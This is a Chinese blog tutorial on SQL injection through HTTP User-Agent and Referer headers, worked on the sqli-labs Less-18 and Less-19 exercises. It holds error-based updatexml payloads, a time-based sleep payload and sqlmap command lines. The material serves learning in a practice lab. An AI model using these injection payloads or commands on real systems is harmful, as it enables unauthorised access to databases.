【安全】P 2-11 HTTP头部的SQL注入

最新推荐文章于 2023-11-07 18:26:20 发布
最新推荐文章于 2023-11-07 18:26:20 发布
阅读量142 收藏
点赞数
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113809576
版权

目录

0X01 HTTP头中的注入介绍

在安全意识越来越重视的情况下,很多网站都在防止漏洞的发生。例如SQL注入中,用户提交的参数都会被代码中的某些措施进行过滤。
在这里插入图片描述

过滤掉用户直接提交的参数,但是对于HTTP头中
提交的内容很有可能就没有进行过滤。
例如HTTP头中 User-Agent、Referer、Cookies等。dui
在这里插入图片描述

0X02 HTTP User-Agent注入

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)
在这里插入图片描述

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

Payload内容:
updatexml(xml_document,xpath_string,new_value):
第一个参数:XML文档对象名称。
第二个参数:XPath字符串。
第三个参数:替换查找到的符合条件的数据。

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or  '1'='1

成功执行
在这里插入图片描述

查看库名称

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or  '1'='1

在这里插入图片描述

构造sql语句再进行下一步操作

0X03 HTTP Referer注入

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
在这里插入图片描述

···
’ or (length(database())) >8 or if(1=1, sleep(5), null) or ‘1’ = '1
···
在这里插入图片描述

通过右下角的响应时间进行判断并继续构建SQL语句进行操作

0X04 sqlmap安全测试

Sqlmap自动搜索POST表单注入:sqlmap.py -u “http://ip/sqltest/post.php” --form
在这里插入图片描述

指定参数探测SQL注入:sqlmap -u http://xxx.xxx.com/Login.asp --data “n=1&p=1”
在这里插入图片描述

指定注入位置进行注入 ,在保存的文件中,对于参数的修改为*。
在这里插入图片描述
在这里插入图片描述

-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
24-4.1 Sqlmap进行http头注入及流量分析
weixin_43263566的博客
02-28 349
利用 SQLMap 进行 HTTP 头注入的方式对于 Less-19 注入点的注入SQLMap 工具我使用kali中自带的。
PHP 防御 HTTP header注入,PHP防止XSS注入解决方案大全
weixin_31366207的博客
03-13 352
PHP直接输出html的,可以采用以下的方法进行过滤:1.htmlspecialchars函数2.htmlentities函数3.HTMLPurifier.auto.php插件4.RemoveXss函数PHP输出到JS代码中,或者开发Json API的,则需要前端在JS中进行过滤:1.尽量使用innerText(IE)和textContent(Firefox),也就是jQuery的text()来输...
网络安全——HTTP头部注入
weixin_54055099的博客
09-16 7189
SQL注入HTTP头部注入,两个例子:Use-Agent注入、XFF注入
SQL注入HTTP头部注入
QYbkx974的博客
11-07 284
1.堆叠查询2.宽字节注入3.Cookie 注入4.base64 注入5.User-Agent 注入6.referer 注入。
HTTP文件头注入和sqlmap的简单使用
bwxzdjn的博客
03-20 2879
用实验的方式介绍HTTP文件头注入和sqlmap的简单使用,通过工具来代替复杂的手工注入操作。
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
广州大学软件安全期末复习笔记
最新发布
03-24
- **SQL注入**: - **原因**:动态SQL查询没有进行有效的输入验证。 - **防范措施**:输入验证、敏感字符替换、预编译SQL等。 - **XSS漏洞**: - **类型**:存储型、反射型。 - **攻击手段**:利用恶意脚本存储...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务097:SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF INJECTION、FILE SYSTEM、OS、WINDOWS REGISTORY、GENERAL、MISCELLANEOUS.mp4 │ 任务098:XSS-简介、跨站脚本检测和常见的利用手段.mp4 │ 任务099:...
Java面试题及答案-共30道.docx
07-18
* 数据源技术:Dbcp、c3p0 等,c3p0 是最稳定和安全的。 * 使用数据源的好处:通过配置文件维护数据库信息,避免硬编码,实现数据库信息的更新。 六、IO 流 * Java 的 IO 流分为两种:输入流和输出流。 * 按照类型...
凹丫丫新闻发布系统源码 V4.7sql版本
03-17
1、修复sql注入 2、解决后台登陆'or'='or' 3、后台权限问题 4、发布文章作者填写问题 5、用户无法修改密码 6、前台版块随后台更改而变化,还可以设置显示与隐藏 7、修复了后台修改文章的错误 8、增加了后台文件批量...
HTTP头中的SQL注入
热门推荐
m_de_g的博客
12-07 1万+
HTTP头中的SQL注入 1.HTTP头中的注入介绍 在安全意识越来越重视的情况下,很多网站都在防止漏洞的发生。例如SQL注入中,用户提交的参数都会被代码中的某些措施进行过滤。 过滤掉用户直接提交的参数,但是对于HTTP头中提交的内容很有可能就没有进行过滤。 例如HTTP头中的User-Agent、Referer、Cookies等。 2.HTTP User-Agent注入 就拿Sqli-Lab-Less18 这里的User-Agent是可控的,因此存在HTTP User-Agent注入 INSERT INT
基于HTTP头部的注入
seaboat——a free boat on the sea.(公众号:远洋号)
06-13 1万+
基于HTTP头部的注入常见的sql注入一般都是通过表单或请求参数进行注入,但这里给出的例子是通过HTTP协议头部进行注入。例如一个的请求如下:GET / HTTP/1.1 Host: www.example.com Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image
sqlmap http头注入的一个技巧
weixin_33943347的博客
10-14 2281
sqlmap.py -u “url”--host * --thread=1 --batch -v 1 --delay=0.7 --dbms mysql --current-db --current-user --dbs https://forum.90sec.org/forum.php?mod=viewthread&tid=9992 转载于:https://www.cnblogs....
SQL注入HTTP头注入漏洞
Eagle_pompom的专栏
04-25 4112
输入参数主要覆盖范围有: HTTP 查询字符参数(GET):输入参数通过URL发送 HTTP 正文参数(POST):输入参数通过HTTP正文发送 HTTP Cookie参数:输入参数通过HTTP cookie发送 HTTP Headers:HTTP提交应用程序使用的头,包括User-agent和Referer头字段 潜在的HTTPSQL注入有:Cookie, User-agent, R...
Apache Camel源码研究之Intercept
夫礼者的专栏
02-07 754
Intercept的理念几乎存在于所有知名框架中,诸如Spring,Mybatis,Tomcat等等都无一例外地提供了相应的扩展支持,在保持自身框架本身整洁的同时,实现对各类业务场景的支持。Apache Camel毫不意外地也提供了自己的Intercept支持,本文我们将尝试对Apache Camel的支持方式和实现逻辑进行一次探究,以期做到熟练运用。
SQL注入之Header注入
秋水的博客
09-01 3932
Header简介 什么是Header头? 通常HTTP消息包括客户机向服务器的请求消息和服务器向客户机的响应消息。这两种类型的消息由一个起始行,一个或者多个头域,一个只是头域结束的空行和可选的消息体组成。HTTP的头域包括通用头,请求头,响应头和实体头四个部分。每个头域由一个域名,冒号(:)和域值三部分组成。域名是大小写无关的,域值前可以添加任何数量的空格符,头域可以被扩展为多行,在每行开始...
HTTP头注入发现方法(有案例)
大方子
08-15 7625
0x0:概述       作者:暗月 博客:www.moonsec.com       关于这类注入点,传统的web漏洞扫描器,基本上是针对GET/POST注入,       对于这类注入的检测就变得有心无力了。 0x01:发现        0x01.1:常见http可能被污染的参数有这些 User-agent 浏览器版本 (少) Referer      来源(少) X-For...
SQLMAP自动注入(二)-REQUEST
含笑
05-23 1万+
数据段: –data get/post都适用 sqlmap -u “http://1.1.1.1/a.php” –data=”user=1&pass=2” -f 变量分隔符:–param-del http://1.1.1.1/a.php?q=foo;id=1 // ; & sqlmap -u “http://1.1.1.1/a.php” –dat
安全】P 2-9 SQL注入绕过手段
Z_David_Z的博客
02-13 283
目录0X01 大小写绕过0X02 双写绕过0X03 编码绕过0X04 内联注释绕过 0X01 大小写绕过 如果程序中设置了过滤关键字,但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只是对整体进行过滤。例如:and 过滤。当然这种过滤只是发现关键字出现,并不会对关键字处理。 通过修改关键字内字母大小写来绕过过滤措施。例如:AnD 1=1 例如:在进行探测当前表的字段数时,使用order by 数字进行探测。如果过滤了order ,可以使用OrdER来进行绕过。 0X02 双写绕过 如果在程序中设置出
SQL注入攻击与防御(第2版) - 安全技术解析
"SQL注入攻击与防御(第2版)是一本关于网络安全的书籍,由Justin Clarke撰写,施宏斌和叶愫翻译成中文版。该书深入探讨了SQL注入这一重要的网络安全威胁及其防御策略。SQL注入是黑客常用的一种攻击手段,通过在Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值